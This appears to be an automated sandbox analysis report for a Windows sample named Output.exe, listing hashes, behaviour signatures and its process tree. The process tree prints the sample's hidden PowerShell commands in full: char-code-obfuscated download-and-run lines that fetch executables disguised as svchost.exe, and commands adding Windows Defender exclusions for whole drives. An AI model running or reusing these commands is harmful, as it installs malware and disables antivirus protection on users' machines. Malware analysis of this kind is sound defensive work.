Overview

overview

10

Static

static

3

Output.exe

windows7-x64

8

Output.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07/03/2025, 17:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Output.exe

  • Size

    127KB

  • MD5

    c5a8c92a6eae175507942fcdb7b6f4d7

  • SHA1

    b75512ae6d1da96e091a657deb49f6047e696bb4

  • SHA256

    59ae3f7403be6eb6d175e19fccc41998188e27419b4f1e3bc9e2e36f123fc36a

  • SHA512

    0796a4886d9e0f078f9a6a1e324cdfbbbfde1a991e2c2be4d764db12980f8b4b6ca743d707a1561587df4dc9d78fb71bf17cb21d3e886e1ccee28a913c44f592

  • SSDEEP

    3072:e274NpVq8BxFRzaqF+o2GQJ7/JzqVfGv2:eegVqwlL

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Output.exe
    "C:\Users\Admin\AppData\Local\Temp\Output.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1780
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\ProgramData\SecorKit.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2672
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url='';$url+=([char]104);$url+=([char]116);$url+=([char]116);$url+=([char]112);$url+=([char]115);$url+=([char]58);$url+=([char]47);$url+=([char]47);$url+=([char]102);$url+=([char]105);$url+=([char]108);$url+=([char]101);$url+=([char]115);$url+=([char]46);$url+=([char]99);$url+=([char]97);$url+=([char]116);$url+=([char]98);$url+=([char]111);$url+=([char]120);$url+=([char]46);$url+=([char]109);$url+=([char]111);$url+=([char]101);$url+=([char]47);$url+=([char]115);$url+=([char]50);$url+=([char]54);$url+=([char]53);$url+=([char]107);$url+=([char]111);$url+=([char]46);$url+=([char]115);$url+=([char]101);$url+=([char]99);$url+=([char]114);$url+=([char]111);$url+=([char]52);$url+=([char]50);$url+=([char]56);$url+=([char]56);$url+=([char]49);$url+=([char]53);$url+=([char]54);$url+=([char]52);$url+=([char]52);$output=\"$env:PUBLIC\svchost.exe\";Invoke-WebRequest -Uri $url -OutFile $output;Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2640
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url='';$url+=([char]0x68);$url+=([char]0x74);$url+=([char]0x74);$url+=([char]0x70);$url+=([char]0x73);$url+=([char]0x3a);$url+=([char]0x2f);$url+=([char]0x2f);$url+=([char]0x66);$url+=([char]0x69);$url+=([char]0x6c);$url+=([char]0x65);$url+=([char]0x73);$url+=([char]0x2e);$url+=([char]0x63);$url+=([char]0x61);$url+=([char]0x74);$url+=([char]0x62);$url+=([char]0x6f);$url+=([char]0x78);$url+=([char]0x2e);$url+=([char]0x6d);$url+=([char]0x6f);$url+=([char]0x65);$url+=([char]0x2f);$url+=([char]0x73);$url+=([char]0x32);$url+=([char]0x36);$url+=([char]0x35);$url+=([char]0x6b);$url+=([char]0x6f);$url+=([char]0x2e);$url+=([char]0x73);$url+=([char]0x65);$url+=([char]0x63);$url+=([char]0x72);$url+=([char]0x6f);$url+=([char]0x34);$url+=([char]0x32);$url+=([char]0x38);$url+=([char]0x38);$url+=([char]0x31);$url+=([char]0x35);$url+=([char]0x36);$url+=([char]0x34);$url+=([char]0x34);$output=\"$env:PUBLIC\svchost.exe\";Invoke-WebRequest -Uri $url -OutFile $output;Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2436
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url0=''; $url0+=([char]104);$url0+=([char]116);$url0+=([char]116);$url0+=([char]112);$url0+=([char]115);$url0+=([char]58);$url0+=([char]47);$url0+=([char]47);$url0+=([char]102);$url0+=([char]105);$url0+=([char]108);$url0+=([char]101);$url0+=([char]115);$url0+=([char]46);$url0+=([char]99);$url0+=([char]97);$url0+=([char]116);$url0+=([char]98);$url0+=([char]111);$url0+=([char]120);$url0+=([char]46);$url0+=([char]109);$url0+=([char]111);$url0+=([char]101);$url0+=([char]47);$url0+=([char]99);$url0+=([char]102);$url0+=([char]117);$url0+=([char]111);$url0+=([char]105);$url0+=([char]56);$url0+=([char]46);$url0+=([char]102);$url0+=([char]117);$url0+=([char]107); $output=\"$env:PUBLIC\svhost0.exe\"; Invoke-WebRequest -Uri $url0 -OutFile $output; Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2492
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url1=''; $url1+=([char]104);$url1+=([char]116);$url1+=([char]116);$url1+=([char]112);$url1+=([char]115);$url1+=([char]58);$url1+=([char]47);$url1+=([char]47);$url1+=([char]102);$url1+=([char]105);$url1+=([char]108);$url1+=([char]101);$url1+=([char]115);$url1+=([char]46);$url1+=([char]99);$url1+=([char]97);$url1+=([char]116);$url1+=([char]98);$url1+=([char]111);$url1+=([char]120);$url1+=([char]46);$url1+=([char]109);$url1+=([char]111);$url1+=([char]101);$url1+=([char]47);$url1+=([char]110);$url1+=([char]56);$url1+=([char]110);$url1+=([char]117);$url1+=([char]103);$url1+=([char]51);$url1+=([char]46);$url1+=([char]102);$url1+=([char]117);$url1+=([char]99);$url1+=([char]107); $output=\"$env:PUBLIC\svhost1.exe\"; Invoke-WebRequest -Uri $url1 -OutFile $output; Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:576
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url2=''; $url2+=([char]104);$url2+=([char]116);$url2+=([char]116);$url2+=([char]112);$url2+=([char]115);$url2+=([char]58);$url2+=([char]47);$url2+=([char]47);$url2+=([char]102);$url2+=([char]105);$url2+=([char]108);$url2+=([char]101);$url2+=([char]115);$url2+=([char]46);$url2+=([char]99);$url2+=([char]97);$url2+=([char]116);$url2+=([char]98);$url2+=([char]111);$url2+=([char]120);$url2+=([char]46);$url2+=([char]109);$url2+=([char]111);$url2+=([char]101);$url2+=([char]47);$url2+=([char]104);$url2+=([char]98);$url2+=([char]108);$url2+=([char]50);$url2+=([char]105);$url2+=([char]103);$url2+=([char]46);$url2+=([char]115);$url2+=([char]101);$url2+=([char]99);$url2+=([char]114);$url2+=([char]111); $output=\"$env:PUBLIC\svhost2.exe\"; Invoke-WebRequest -Uri $url2 -OutFile $output; Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2784
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c mountvol | find ":"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1696
        • C:\Windows\system32\mountvol.exe
          mountvol
          4⤵
            PID:1484
          • C:\Windows\system32\find.exe
            find ":"
            4⤵
              PID:1440
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath MOUNTVOL
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1164
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath MOUNTVOL
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:560
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath MOUNTVOL
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1908
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath MOUNTVOL
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1008
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath Possible
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2256
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath C:\
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2324
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath F:\
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3048
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath D:\
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:908

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\SecorKit.bat
        Filesize

        4KB

        MD5

        bc1626613575b1b6f297de25534b5558

        SHA1

        3e09f43f58461e7ae1da21a3a7401e802c9501db

        SHA256

        bf212323f92dd7b684fd7b61fdc56b984d48396d80022aacb5b803031d454000

        SHA512

        7b736f2416e0354661805ce06bf05e4515d56ab4a2dc4f6118df6d86053742064f867c762a251c06eee548cbc46ba5e788a8b49a6e59bafdb4e7d662776d869f

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        e973ca35d90bf0000afd00ec6b83c1fe

        SHA1

        1c6db2a6372af1838521ad2f062660f917457d97

        SHA256

        b4f0f77be7f7403b09b2d53da5f19e37a2cc7487e75b607ea333694a45b63fac

        SHA512

        f5e0b660fd7f67c107bf1f628e58f0097351d64d6bdab83df99c73972516788b636c1c461d7b5b8bba50d7580d5fda61668478e01828fa1ab02d6b35af01f392

        Download Submit

      • memory/1780-0-0x000007FEF57E3000-0x000007FEF57E4000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1780-1-0x0000000000D60000-0x0000000000D86000-memory.dmp

        Filesize

        152KB

        Download

      • memory/2436-24-0x0000000002780000-0x0000000002788000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2436-23-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2640-15-0x00000000029D0000-0x0000000002A50000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2640-16-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2640-17-0x0000000001D90000-0x0000000001D98000-memory.dmp

        Filesize

        32KB

        Download